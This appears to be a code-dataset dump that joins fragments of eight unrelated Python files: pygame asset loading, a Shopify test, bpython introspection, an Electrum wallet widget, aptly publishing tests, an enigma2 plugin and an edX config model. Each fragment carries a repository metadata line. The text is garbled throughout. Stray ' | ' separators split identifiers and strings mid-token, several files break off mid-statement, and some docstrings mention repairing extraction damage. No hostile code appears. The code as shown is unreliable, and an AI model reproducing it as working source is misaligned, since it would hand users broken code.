img_title_screen = pg.image.load(os.path.join('resources', 'img', 'title.png')).convert()
img_bomb = pg.image.load(os.path.join('resources', 'img', 'bomb.png')).convert_alpha()
bomb_size = img_bomb.get_size()
img_apple = pg.image.load(os.path.join('resources', 'img', 'apple.png')).convert_alpha()
apple_size = img_apple.get_size()
img_head = pg.image.load(os.path.join('resources', 'img', 'snakehead.png')).convert_alpha()
img_body = pg.image.load(os.path.join('resources', 'img', 'snakebody.png')).convert()
img_heart = pg.image.load(os.path.join('resources', 'img', 'heart.png')).convert_alpha()
img_heart = pg.transform.scale(img_heart, (20, 20))
img_dog = pg.image.load(os.path.join('resources', 'img', 'bruh.png')).convert()
img_dog = pg.transform.scale(img_dog, (480, 440))
img_dog_neg = pg.image.load(os.path.join('resources', 'img', 'bruh_neg.png')).convert()
img_dog_neg = pg.transform.scale(img_dog_neg, (480, 440))
img_explosion = pg.image.load(os.path.join('resources', 'img', 'explosion.png')).convert_alpha()
img_explosion = pg.transform.scale2x(img_explosion)
explosion_size = img_explosion.get_size()
img_bullet = pg.image.load(os.path.join('resources', 'img', 'bullet.png')).convert_alpha()
img_time_up = pg.image.load(os.pat | h.join(' | resources', 'img', 'time_up.png')).convert()
|
Shopify/shopify_python_api | test/shipping_zone_test.py | Python | mit | 446 | 0.002242 | import shopify
from test.test_helper import TestCase
class ShippingZoneTest(TestCase):
    """Tests for shopify.ShippingZone.  (Reconstructs two identifiers —
    the class name and 'countries' — broken by extraction artifacts.)"""

    def test_get_shipping_zones(self):
        """A faked GET /shipping_zones parses the zone name and its
        nested countries collection."""
        self.fake("shipping_zones", method="GET", body=self.load_fixture("shipping_zones"))
        shipping_zones = shopify.ShippingZone.find()
        self.assertEqual(1, len(shipping_zones))
        self.assertEqual(shipping_zones[0].name, "Some zone")
        self.assertEqual(3, len(shipping_zones[0].countries))
|
rusucosmin/courses | ubb/fop/2015.Seminar.09/domain/IDObject.py | Python | mit | 514 | 0.005837 | class IDObject():
"""
Base class for all objects having unique id within the application
"""
def __init__(self, objectId):
"""
Constructor method for bui | lding IDObject
objectId - the unique objectId of the object in the app | lication
"""
self._objectId = objectId
def getId(self):
"""
Return the object's unique id
"""
return self._objectId
def testIDObject():
    """Smoke test: the id given to the constructor is the id returned."""
    sample = IDObject(133)
    assert sample.getId() == 133
crakensio/django_training | lib/python2.7/site-packages/bpython/inspection.py | Python | cc0-1.0 | 8,924 | 0.000784 | # Th | e MIT License
#
# Copyright (c) 2009-2011 the bpython authors.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# | furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
from __future__ import with_statement
import collections
import inspect
import keyword
import pydoc
import re
import types
from pygments.token import Token
from bpython._py3compat import PythonLexer, py3
try:
collections.Callable
has_collections_callable = True
except AttributeError:
has_collections_callable = False
try:
types.InstanceType
has_instance_type = True
except AttributeError:
has_instance_type = False
if not py3:
_name = re.compile(r'[a-zA-Z_]\w*$')
class AttrCleaner(object):
    """A context manager that tries to make an object not exhibit side-effects
    on attribute lookup.

    NOTE: __enter__ returns None, so ``with AttrCleaner(o) as x`` binds x to
    None — the manager is used purely for its (temporary) side effects on
    the object's type.
    """

    def __init__(self, obj):
        self.obj = obj

    def __enter__(self):
        """Try to make an object not exhibit side-effects on attribute
        lookup by temporarily neutralizing __getattr__/__getattribute__ on
        its type; the originals are stashed in self.attribs for __exit__."""
        type_ = type(self.obj)
        __getattribute__ = None
        __getattr__ = None
        # Dark magic:
        # If __getattribute__ doesn't exist on the class and __getattr__ does
        # then __getattr__ will be called when doing
        #   getattr(type_, '__getattribute__', None)
        # so we need to first remove the __getattr__, then the
        # __getattribute__, then look up the attributes and then restore the
        # original methods. :-(
        # The upshot being that introspecting on an object to display its
        # attributes will avoid unwanted side-effects.
        # (Old-style instances on Python 2 are skipped entirely.)
        if py3 or type_ != types.InstanceType:
            __getattr__ = getattr(type_, '__getattr__', None)
            if __getattr__ is not None:
                try:
                    setattr(type_, '__getattr__', (lambda *_, **__: None))
                except TypeError:
                    # Type forbids mutation; remember that by keeping None.
                    __getattr__ = None
            __getattribute__ = getattr(type_, '__getattribute__', None)
            if __getattribute__ is not None:
                try:
                    setattr(type_, '__getattribute__', object.__getattribute__)
                except TypeError:
                    # XXX: This happens for e.g. built-in types
                    __getattribute__ = None
        self.attribs = (__getattribute__, __getattr__)
        # /Dark magic

    def __exit__(self, exc_type, exc_val, exc_tb):
        """Restore an object's magic methods."""
        type_ = type(self.obj)
        __getattribute__, __getattr__ = self.attribs
        # Dark magic: put back whichever methods were patched in __enter__.
        if __getattribute__ is not None:
            setattr(type_, '__getattribute__', __getattribute__)
        if __getattr__ is not None:
            setattr(type_, '__getattr__', __getattr__)
        # /Dark magic
class _Repr(object):
"""
Helper for `fixlongargs()`: Returns the given value in `__repr__()`.
"""
def __init__(self, value):
self.value = value
def __repr__(self):
return self.value
__str__ = __repr__
def parsekeywordpairs(signature):
    """Map keyword-argument names to their default-value *source text*.

    Tokenizes the function's source ``signature`` with pygments and returns
    a dict ``{param_name: default_expression_text}``.  Only parameters with
    a default (token groups of the shape ``name = expr``) end up in the
    result.
    """
    tokens = PythonLexer().get_tokens(signature)
    preamble = True
    stack = []        # completed parameter token groups
    substack = []     # tokens of the parameter currently being read
    parendepth = 0    # nesting relative to the signature's own parens
    for token, value in tokens:
        if preamble:
            # Skip "def name" until the opening paren of the parameter list.
            if token is Token.Punctuation and value == u"(":
                preamble = False
            continue

        if token is Token.Punctuation:
            if value in [u'(', u'{', u'[']:
                parendepth += 1
            elif value in [u')', u'}', u']']:
                parendepth -= 1
            elif value == ':' and parendepth == -1:
                # End of signature reached
                break
            if ((value == ',' and parendepth == 0) or
                    (value == ')' and parendepth == -1)):
                # Parameter boundary: close the current token group.
                stack.append(substack)
                substack = []
                continue

        # Keep whitespace only inside nested brackets (part of a default
        # expression); elsewhere keep non-blank tokens only.
        if value and (parendepth > 0 or value.strip()):
            substack.append(value)

    d = {}
    for item in stack:
        # A defaulted parameter group is at least [name, '=', expr...].
        if len(item) >= 3:
            d[item[0]] = ''.join(item[2:])
    return d
def fixlongargs(f, argspec):
    """Functions taking default arguments that are references to other objects
    whose str() is too big will cause breakage, so we swap out the object
    itself with the name it was referenced with in the source by parsing the
    source itself !"""
    # argspec layout follows inspect.getargspec: [0]=arg names, [3]=defaults.
    if argspec[3] is None:
        # No keyword args, no need to do anything
        return
    values = list(argspec[3])
    if not values:
        return
    # Defaults align with the *last* len(values) positional parameters.
    keys = argspec[0][-len(values):]
    try:
        src = inspect.getsourcelines(f)
    except (IOError, IndexError):
        # IndexError is raised in inspect.findsource(), can happen in
        # some situations. See issue #94.
        return
    signature = ''.join(src[0])
    kwparsed = parsekeywordpairs(signature)

    for i, (key, value) in enumerate(zip(keys, values)):
        # Heuristic: when the live repr differs in length from the source
        # text, show the source text instead of the (huge) repr.
        if len(repr(value)) != len(kwparsed[key]):
            values[i] = _Repr(kwparsed[key])

    argspec[3] = values
def getpydocspec(f, func):
    """Reconstruct an argspec for *f* by parsing its pydoc documentation.

    Many C-implemented callables cannot be introspected, but their docs
    often begin with a ``name(arg, ...)`` line.  Returns
    ``[func, (args, varargs, varkwargs, defaults, kwonly_args,
    kwonly_defaults)]`` or ``None`` when nothing usable is found.
    """
    try:
        doc = pydoc.getdoc(f)
    except NameError:
        return None

    match = re.compile(r'([a-zA-Z_][a-zA-Z0-9_]*?)\((.*?)\)').search(doc)
    if match is None:
        return None

    # Only trust the parsed signature if it names this very callable.
    if not hasattr(f, '__name__') or match.group(1) != f.__name__:
        return None

    args = []
    defaults = []
    varargs = varkwargs = None
    kwonly_args = []
    kwonly_defaults = {}
    for raw in match.group(2).split(','):
        raw = raw.strip()
        if raw.startswith('**'):
            varkwargs = raw[2:]
        elif raw.startswith('*'):
            varargs = raw[1:]
        else:
            name, _, default = raw.partition('=')
            if varargs is not None:
                # Positional section is over: keyword-only parameter.
                kwonly_args.append(name)
                if default:
                    kwonly_defaults[name] = default
            else:
                args.append(name)
                if default:
                    defaults.append(default)

    return [func, (args, varargs, varkwargs, defaults,
                   kwonly_args, kwonly_defaults)]
def getargspec(func, f):
    """Best-effort argspec for callable *f* (referenced in source as *func*).

    Tries inspect first, then falls back to parsing pydoc output via
    getpydocspec().  NOTE(review): the visible chunk ends right after the
    fallback; the final ``return`` appears to lie beyond this excerpt.
    """
    # Check if it's a real bound method or if it's implicitly calling __init__
    # (i.e. FooClass(...) and not FooClass.__init__(...) -- the former would
    # not take 'self', the latter would:
    try:
        func_name = getattr(f, '__name__', None)
    except:
        # if calling foo.__name__ would result in an error
        func_name = None

    try:
        is_bound_method = ((inspect.ismethod(f) and f.im_self is not None)
                           or (func_name == '__init__' and not
                               func.endswith('.__init__')))
    except:
        # if f is a method from a xmlrpclib.Server instance, func_name ==
        # '__init__' throws xmlrpclib.Fault (see #202)
        return None
    try:
        if py3:
            argspec = inspect.getfullargspec(f)
        else:
            argspec = inspect.getargspec(f)

        argspec = list(argspec)
        # Replace oversized default reprs with their source text.
        fixlongargs(f, argspec)
        argspec = [func, argspec, is_bound_method]
    except (TypeError, KeyError):
        # Not introspectable -- try the docstring, guarding against
        # attribute-lookup side effects while we do so.
        with AttrCleaner(f):
            argspec = getpydocspec(f, func)
        if argspec is None:
            return None
|
cryptapus/electrum-myr | gui/qt/paytoedit.py | Python | mit | 9,506 | 0.00242 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qrtextedit import ScanQRTextEdit
import re
from decimal import Decimal
from electrum import bitcoin
import util
# Base58 address body (excludes 0, O, I, l), at least 26 characters long.
RE_ADDRESS = '[1-9A-HJ-NP-Za-km-z]{26,}'
# "label <address>" alias form; group 2 captures the address itself.
RE_ALIAS = '(.*?)\s*\<([1-9A-HJ-NP-Za-km-z]{26,})\>'

# Stylesheets toggled by PayToEdit.setFrozen().
frozen_style = "QWidget { background-color:none; border:none;}"
normal_style = "QPlainTextEdit { }"
class PayToEdit(ScanQRTextEdit):
    def __init__(self, win):
        """Multi-line pay-to editor.

        :param win: the send-tab window; provides ``amount_e``,
            ``pay_to_URI`` and fee/locking callbacks used below.
        """
        ScanQRTextEdit.__init__(self)
        self.win = win
        self.amount_edit = win.amount_e
        # Re-fit the widget height whenever the text changes.
        self.document().contentsChanged.connect(self.update_size)
        self.heightMin = 0
        self.heightMax = 150
        self.c = None  # QCompleter, attached later via setCompleter()
        self.textChanged.connect(self.check_text)
        self.outputs = []      # parsed (type, destination, amount) tuples
        self.errors = []       # (line_number, text) pairs that failed to parse
        self.is_pr = False     # True while showing a payment request
        self.is_alias = False
        self.scan_f = win.pay_to_URI
        self.update_size()
        self.payto_address = None  # set when the field holds a single output
        self.previous_payto = ''
def setFrozen(self, b):
self.setReadOnly(b)
self.setStyleSheet(frozen_style if b else normal_style)
for button in self.buttons:
button.setHidden(b)
    def setGreen(self):
        # Green background: destination verified / payment request valid.
        self.setStyleSheet(util.GREEN_BG)
    def setExpired(self):
        # Red background: payment request has expired.
        self.setStyleSheet(util.RED_BG)
def parse_address_and_amount(self, line):
x, y = line.split(',')
out_type, out = self.parse_output(x)
amount = self.parse_amount(y)
return out_type, out, amount
def parse_output(self, x):
try:
address = self.parse_address(x)
return bitcoin.TYPE_ADDRESS, address
except:
script = self.parse_script(x)
return bitcoin.TYPE_SCRIPT, script
    def parse_script(self, x):
        """Assemble a raw script from whitespace-separated tokens.

        Tokens starting with ``OP_`` are looked up in the opcode table;
        anything else is treated as hex data and wrapped in a push opcode.
        Raises (AssertionError / decode errors) on unknown tokens.
        """
        from electrum.transaction import opcodes, push_script
        script = ''
        for word in x.split():
            if word[0:3] == 'OP_':
                assert word in opcodes.lookup
                script += chr(opcodes.lookup[word])
            else:
                # Hex-encoded data: emit push opcode + payload bytes.
                script += push_script(word).decode('hex')
        return script
def parse_amount(self, x):
if x.strip() == '!':
return '!'
p = pow(10, self.amount_edit.decimal_point())
return int(p * Decimal(x.strip()))
def parse_address(self, line):
r = line.strip()
m = re.match('^'+RE_ALIAS+'$', r)
address = str(m.group(2) if m else r)
assert bitcoin.is_address(address)
return address
    def check_text(self):
        """Re-parse the whole field after every edit.

        Single-line input may be a URI (delegated to ``scan_f``) or a lone
        destination; multi-line input is parsed as ``dest, amount`` pairs.
        Updates ``self.outputs``, ``self.errors``, the amount widget and the
        window's max/lock state as side effects.
        """
        self.errors = []
        if self.is_pr:
            # A payment request controls the field; nothing to parse.
            return
        # filter out empty lines
        lines = filter(lambda x: x, self.lines())
        outputs = []
        total = 0
        self.payto_address = None
        if len(lines) == 1:
            data = lines[0]
            if data.startswith("myriadcoin:"):
                # Looks like a payment URI -- hand off to the window.
                self.scan_f(data)
                return
            try:
                self.payto_address = self.parse_output(data)
            except:
                pass
            if self.payto_address:
                # Bare destination: amount comes from the amount widget.
                self.win.lock_amount(False)
                return
        is_max = False
        for i, line in enumerate(lines):
            try:
                _type, to_address, amount = self.parse_address_and_amount(line)
            except:
                # Remember the bad line so the UI can flag it.
                self.errors.append((i, line.strip()))
                continue
            outputs.append((_type, to_address, amount))
            if amount == '!':
                is_max = True
            else:
                total += amount
        self.win.is_max = is_max
        self.outputs = outputs
        self.payto_address = None
        if self.win.is_max:
            self.win.do_update_fee()
        else:
            self.amount_edit.setAmount(total if outputs else None)
            # Lock the amount widget when amounts are spelled out inline.
            self.win.lock_amount(total or len(lines)>1)
    def get_errors(self):
        # (line_number, text) pairs collected by the last check_text() run.
        return self.errors
    def get_recipient(self):
        # Single parsed destination, or None in multi-output mode.
        return self.payto_address
def get_outputs(self, is_max):
if self.payto_address:
if is_max:
amount = '!'
else:
amount = self.amount_edit.get_amount()
_type, addr = self.payto_address
self.outputs = [(_type, addr, amount)]
return self.outputs[:]
    def lines(self):
        # Field content as a list of lines (Python 2 unicode).
        return unicode(self.toPlainText()).split('\n')
    def is_multiline(self):
        # True when the user is entering multiple outputs.
        return len(self.lines()) > 1
    def paytomany(self):
        # Pre-fill several blank lines to switch into multi-output mode.
        self.setText("\n\n\n")
        self.update_size()
    def update_size(self):
        """Grow/shrink the widget with its content, within [heightMin, heightMax]."""
        docHeight = self.document().size().height()
        # 17px per line plus frame padding -- tuned to the default font.
        h = docHeight*17 + 11
        if self.heightMin <= h <= self.heightMax:
            self.setMinimumHeight(h)
            self.setMaximumHeight(h)
        self.verticalScrollBar().hide()
    def setCompleter(self, completer):
        """Attach a QCompleter (e.g. over known contacts) to this editor."""
        self.c = completer
        self.c.setWidget(self)
        self.c.setCompletionMode(QCompleter.PopupCompletion)
        self.c.activated.connect(self.insertCompletion)
    def insertCompletion(self, completion):
        """Splice the chosen completion's remaining characters at the cursor."""
        if self.c.widget() != self:
            return
        tc = self.textCursor()
        # Characters of the completion that are not yet typed.
        extra = completion.length() - self.c.completionPrefix().length()
        tc.movePosition(QTextCursor.Left)
        tc.movePosition(QTextCursor.EndOfWord)
        tc.insertText(completion.right(extra))
        self.setTextCursor(tc)
    def textUnderCursor(self):
        # The word the cursor is currently on (used as completion prefix).
        tc = self.textCursor()
        tc.select(QTextCursor.WordUnderCursor)
        return tc.selectedText()
def keyPressEvent(self, e):
if self.isReadOnly():
return
if self.c.popup().isVisible():
if e.key() in [Qt.Key_Enter, Qt.Key_Return]:
e.ignore()
return
if e.key() in [Qt.Key_Tab]:
e.ignore()
return
if e.key() in [Qt.Key_Down, Qt.Key_Up] and not self.is_mult | iline():
e.ignore()
return
QPlainTextEdit.keyPressEvent(self, e)
ctrlOrShift = e.modifiers() and (Qt.ControlModifier or Qt.ShiftModifier)
if self.c is None or (ctrlOrShift and e.text().isEmpty()):
return
eow = QString("~!@#$%^&*()_+{}|:\"<>?,./;'[]\\-=")
hasModifier = | (e.modifiers() != Qt.NoModifier) and not ctrlOrShift;
completionPrefix = self.textUnderCursor()
if hasModifier or e.text().isEmpty() or completionPrefix.length() < 1 or eow.contains(e.text().right(1)):
self.c.popup().hide()
return
if completionPrefix != self.c.completionPrefix():
self.c.setCompletionPrefix(completionPrefix);
self.c.popup().setCurrentIndex(self.c.completionModel().index(0, 0))
cr = self.cursorRect()
cr.setWidth(self.c.popup().sizeHintForColumn(0) + self.c.popup().verticalScrollBar().sizeHint().width())
self.c.complete(cr)
def qr_input(self):
data = super(PayToEdit,self).qr_input()
if data.startswith("myriadcoi |
smira/aptly | system/t06_publish/swift.py | Python | mit | 7,962 | 0.003893 | from swift_lib import SwiftTest
def strip_processor(output):
    """Normalize a Release file for comparison.

    Drops indented lines (checksum entries) and ``Date:`` headers, which
    vary between publish runs.
    """
    kept = []
    for line in output.split("\n"):
        if line.startswith(' ') or line.startswith('Date:'):
            continue
        kept.append(line)
    return "\n".join(kept)
class SwiftPublish1Test(SwiftTest):
    """
    publish to Swift: from repo
    """
    # Build a local repo, add the fixture packages, drop one of them.
    fixtureCmds = [
        "aptly repo create -distribution=maverick local-repo",
        "aptly repo add local-repo ${files}",
        "aptly repo remove local-repo libboost-program-options-dev_1.62.0.1_i386",
    ]
    runCmd = "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo swift:test1:"

    def check(self):
        # Verify the published repo layout and contents in the Swift container.
        super(SwiftPublish1Test, self).check()

        self.check_exists('dists/maverick/InRelease')
        self.check_exists('dists/maverick/Release')
        self.check_exists('dists/maverick/Release.gpg')

        self.check_exists('dists/maverick/main/binary-i386/Packages')
        self.check_exists('dists/maverick/main/binary-i386/Packages.gz')
        self.check_exists('dists/maverick/main/binary-i386/Packages.bz2')
        self.check_exists('dists/maverick/main/source/Sources')
        self.check_exists('dists/maverick/main/source/Sources.gz')
        self.check_exists('dists/maverick/main/source/Sources.bz2')

        self.check_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
        self.check_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
        self.check_exists('pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
        self.check_exists('pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
        self.check_exists('pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')

        # # verify contents except of sums
        self.check_file_contents('dists/maverick/Release', 'release', match_prepare=strip_processor)
        self.check_file_contents('dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
        self.check_file_contents('dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class SwiftPublish2Test(SwiftTest):
    """
    publish to Swift: publish update removed some packages
    """
    # Publish first, then remove pyspi so the subsequent update must
    # clean its files out of the pool.
    fixtureCmds = [
        "aptly repo create -distribution=maverick local-repo",
        "aptly repo add local-repo ${files}/",
        "aptly repo remove local-repo libboost-program-options-dev_1.62.0.1_i386",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo swift:test1:",
        "aptly repo remove local-repo pyspi"
    ]
    runCmd = "aptly publish update -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick swift:test1:"

    def check(self):
        super(SwiftPublish2Test, self).check()

        self.check_exists('dists/maverick/InRelease')
        self.check_exists('dists/maverick/Release')
        self.check_exists('dists/maverick/Release.gpg')

        self.check_exists('dists/maverick/main/binary-i386/Packages')
        self.check_exists('dists/maverick/main/binary-i386/Packages.gz')
        self.check_exists('dists/maverick/main/binary-i386/Packages.bz2')
        self.check_exists('dists/maverick/main/source/Sources')
        self.check_exists('dists/maverick/main/source/Sources.gz')
        self.check_exists('dists/maverick/main/source/Sources.bz2')

        # pyspi was removed, so its files must be gone from the pool.
        self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
        self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
        self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
        self.check_not_exists('pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
        self.check_exists('pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')

        # verify contents except of sums
        self.check_file_contents('dists/maverick/Release', 'release', match_prepare=strip_processor)
        self.check_file_contents('dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
        self.check_file_contents('dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class SwiftPublish3Test(SwiftTest):
    """
    publish to Swift: publish switch - removed some packages
    """
    fixtureDB = True
    fixturePool = True
    # snap3 contains only gnuplot-x11 pulled from snap1; switching the
    # published distribution to it must drop the other packages.
    fixtureCmds = [
        "aptly snapshot create snap1 from mirror gnuplot-maverick",
        "aptly snapshot create snap2 empty",
        "aptly snapshot pull -no-deps -architectures=i386,amd64 snap2 snap1 snap3 gnuplot-x11",
        "aptly publish snapshot -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=maverick snap1 swift:test1:",
    ]
    runCmd = "aptly publish switch -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick swift:test1: snap3"

    def check(self):
        super(SwiftPublish3Test, self).check()

        self.check_exists('dists/maverick/InRelease')
        self.check_exists('dists/maverick/Release')
        self.check_exists('dists/maverick/Release.gpg')

        self.check_exists('dists/maverick/main/binary-i386/Packages.gz')
        self.check_exists('dists/maverick/main/binary-i386/Packages.bz2')
        self.check_exists('dists/maverick/main/binary-amd64/Packages')
        self.check_exists('dists/maverick/main/binary-amd64/Packages.gz')
        self.check_exists('dists/maverick/main/binary-amd64/Packages.bz2')

        self.check_exists('pool/main/g/gnuplot/gnuplot-x11_4.6.1-1~maverick2_i386.deb')
        self.check_exists('pool/main/g/gnuplot/gnuplot-x11_4.6.1-1~maverick2_amd64.deb')
        self.check_not_exists('pool/main/g/gnuplot/gnuplot-nox_4.6.1-1~maverick2_i386.deb')
        self.check_not_exists('pool/main/g/gnuplot/gnuplot-nox_4.6.1-1~maverick2_amd64.deb')

        # verify contents except of sums
        self.check_file_contents('dists/maverick/Release', 'release', match_prepare=strip_processor)

        self.check_file_contents('dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class SwiftPublish4Test(SwiftTest):
    """
    publish to Swift: multiple repos, list
    """
    # Same repo published under several distributions/prefixes; the run
    # command just lists them (output checked by the harness).
    fixtureCmds = [
        "aptly repo create -distribution=maverick local-repo",
        "aptly repo add local-repo ${udebs}",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo swift:test1:",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=xyz local-repo swift:test1:",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo swift:test1:prefix",
    ]
    runCmd = "aptly publish list"
class SwiftPublish5Test(SwiftTest):
    """
    publish to Swift: publish drop - component cleanup
    """
    # Two published repos share the boost package; dropping sq2 must only
    # remove files not referenced by sq1.  (This block also repairs two
    # garbled tokens present in the source chunk.)
    fixtureCmds = [
        "aptly repo create local1",
        "aptly repo create local2",
        "aptly repo add local1 ${files}/libboost-program-options-dev_1.49.0.1_i386.deb",
        "aptly repo add local2 ${files}",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=sq1 local1 swift:test1:",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=sq2 local2 swift:test1:",
    ]
    runCmd = "aptly publish drop sq2 swift:test1:"

    def check(self):
        super(SwiftPublish5Test, self).check()

        self.check_exists('dists/sq1')
        self.check_not_exists('dists/sq2')

        self.check_exists('pool/main/')
        # pyspi files belonged only to sq2 and must be cleaned up.
        self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
        self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
        self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
        self.check_not_exists('pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
        # boost is still referenced by sq1, so it stays.
        self.check_exists('pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')
|
popazerty/enigma2 | lib/python/Plugins/Extensions/LDteam/ExtraActionBox.py | Python | gpl-2.0 | 1,524 | 0.022966 | # -*- coding: utf-8 -*-
from enigma import *
from Screens.Screen import Screen
from Components.ActionMap import ActionMap
from Components.MenuList import MenuList
from Components.GUIComponent import GUIComponent
from Components.HTMLComponent import HTMLComponent
from Tools.Directories import fileExists, SCOPE_SKIN_IMAGE, SCOPE_CURRENT_SKIN, resolveFilename
from Components.Label import Label
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from Components.Pixmap import Pixmap
from Tools.LoadPixmap import LoadPixmap
class ExtraActionBox(Screen):
    """Modal "please wait" screen that runs a callable and closes with its result.

    Repairs two garbled tokens from the source chunk (screen name and the
    "message" widget key).
    """
    skin = """
    <screen name="ExtraActionBox" position="center,center" size="560,70" title=" ">
        <widget font="Regular;20" halign="center" name="message" position="10,10" size="538,48" valign="center" />
    </screen>"""

    def __init__(self, session, message, title, action):
        """
        :param message: text shown while the action runs
        :param title: window title set after the screen is built
        :param action: zero-argument callable; its return value is passed
            to ``self.close()``
        """
        Screen.__init__(self, session)
        self.session = session
        self.ctitle = title
        self.caction = action

        self["message"] = Label(message)
        # NOTE(review): the skin above defines no "logo" widget, but the
        # code below references one -- confirm against the deployed skin.
        self["logo"] = Pixmap()

        # Defer title/pixmap setup until the screen has been realized.
        self.timer = eTimer()
        self.timer.callback.append(self.__setTitle)
        self.timer.start(200, 1)

    def __setTitle(self):
        if self["logo"].instance is not None:
            self["logo"].instance.setPixmapFromFile(resolveFilename(SCOPE_CURRENT_SKIN, '/usr/lib/enigma2/python/Plugins/Extensions/LDteam/images/extra/run.png'))
        self.setTitle(self.ctitle)
        # Give the UI a moment to paint before running the action.
        self.timer = eTimer()
        self.timer.callback.append(self.__start)
        self.timer.start(200, 1)

    def __start(self):
        # Run the action and close, handing its result back to the caller.
        self.close(self.caction())
|
eduNEXT/edunext-platform | lms/djangoapps/email_marketing/models.py | Python | agpl-3.0 | 5,191 | 0.002697 | """
Email-marketing-related models.
"""
from config_models.models import ConfigurationModel
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
@python_2_unicode_compatible
class EmailMarketingConfiguration(ConfigurationModel):
    """
    Email marketing configuration

    .. no_pii:
    """
    class Meta:
        app_label = "email_marketing"

    # --- Sailthru API credentials -------------------------------------
    sailthru_key = models.fields.CharField(
        max_length=32,
        help_text=_(
            "API key for accessing Sailthru. "
        )
    )

    sailthru_secret = models.fields.CharField(
        max_length=32,
        help_text=_(
            "API secret for accessing Sailthru. "
        )
    )

    sailthru_new_user_list = models.fields.CharField(
        max_length=48,
        help_text=_(
            "Sailthru list name to add new users to. "
        )
    )

    # --- Connection retry behaviour -----------------------------------
    sailthru_retry_interval = models.fields.IntegerField(
        default=3600,
        help_text=_(
            "Sailthru connection retry interval (secs)."
        )
    )

    sailthru_max_retries = models.fields.IntegerField(
        default=24,
        help_text=_(
            "Sailthru maximum retries."
        )
    )

    # --- Send templates (names of templates configured in Sailthru) ---
    sailthru_welcome_template = models.fields.CharField(
        max_length=20,
        blank=True,
        help_text=_(
            "Sailthru template to use on welcome send."
        )
    )

    sailthru_abandoned_cart_template = models.fields.CharField(
        max_length=20,
        blank=True,
        help_text=_(
            "Sailthru template to use on abandoned cart reminder. Deprecated."
        )
    )

    sailthru_abandoned_cart_delay = models.fields.IntegerField(
        default=60,
        help_text=_(
